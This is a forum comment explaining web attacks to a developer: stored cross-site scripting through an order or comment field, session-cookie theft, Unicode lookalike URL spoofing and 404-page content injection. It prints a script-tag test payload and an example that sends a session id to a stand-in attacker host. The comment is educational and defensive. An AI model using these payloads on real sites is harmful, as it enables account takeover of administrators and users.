by jamiesonbecker 3387 days ago
Your humility is pretty awesome.

As a simple example, paste <script>alert("haha")</script> into a form in your system that will (eventually) be viewable to someone else. Let's say it's something innocuous like the quantity field on an order form or a comment on a comment form.

Now, none of those characters will attack your database through SQL injection, right? So what happens when you (the administrator) view your latest orders? Basically, that JavaScript is now operating in the security context of you, the administrator, not in the context of the attacker that submitted it. It could do something worse than alert()... for example, it could grab your session token or a cookie's secret value (depending on the cookie) and send it off to <img src=evilattacker.xyz/clear.gif?sid=xxxx>, and now the attacker can become you.

Or, it could do the same thing to another user on your forum when they look at the evil comment.

This sort of attack is easy to do and broadly considered XSS (cross-site scripting). There are related areas of attack, like cookie forgery, referral, etc. attacks. The OWASP string replacement guidelines (or my safify.js) can help with this, but ultimately string sanitation has to make sense for the context (i.e., browser bad characters are different from SQL injection bad characters).

And, you have to think about the weakest link... us poor humans, to whom similar 𝖻𝗎𝗍 𝗇𝗈𝗍 𝗊𝗎𝗂𝗍𝖾 𝗍𝗁𝖾 𝗌𝖺𝗆𝖾 𝗎𝗇𝗂𝖼𝗈𝖽𝖾 𝗅𝖾𝗍𝗍𝖾𝗋𝗌 𝖼𝖺𝗇 𝖻𝖾 𝗎𝗌𝖾𝖽 𝗍𝗈 𝗍𝗋𝗂𝖼𝗄 𝗌𝗈𝗆𝖾𝗈𝗇𝖾... 𝗆𝖺𝗒𝖻𝖾 𝗍𝗁𝖾𝗒 𝗍𝗁𝗂𝗇𝗄 𝗂𝗍'𝗌 𝖺 𝖽𝗂𝖿𝖿𝖾𝗋𝖾𝗇𝗍 𝖴𝖱𝖫 𝗍𝗁𝖺𝗇 𝗂𝗍 𝗂𝗌, 𝗈𝗋 𝖺 𝖽𝗂𝖿𝖿𝖾𝗋𝖾𝗇𝗍 𝗎𝗌𝖾𝗋𝗇𝖺𝗆𝖾.. (paste that into vim to see the actual characters in the preceding sentence.)

    𝗁𝗍𝗍𝗉𝗌://𝗀𝗈𝗈𝗀𝗅𝖾.𝖼𝗈𝗆/?𝗊=𝗇𝗈𝗍+𝗐𝗁𝖺𝗍+𝗒𝗈𝗎+𝗍𝗁𝗂𝗇𝗄
None of those unicode characters will usually trigger any blacklists, but because it "looks" right, it can sometimes even trick security-aware hackers. (see also punycode). What if someone spoofs someone's username on github?

There's lots and lots of interesting ways to attack websites. It's tough to keep track of them all.

Another example. Your 404 page..

    <h1>404</h1>
    <p>Sorry, /x/y/z doesn't exist.</p>
Now, someone says "Hey, can you please visit this site?"

https://yoursite.com/this-is-a-long-url-thats-hidden-in-a-an...

1 comments

Humility is all I've got :)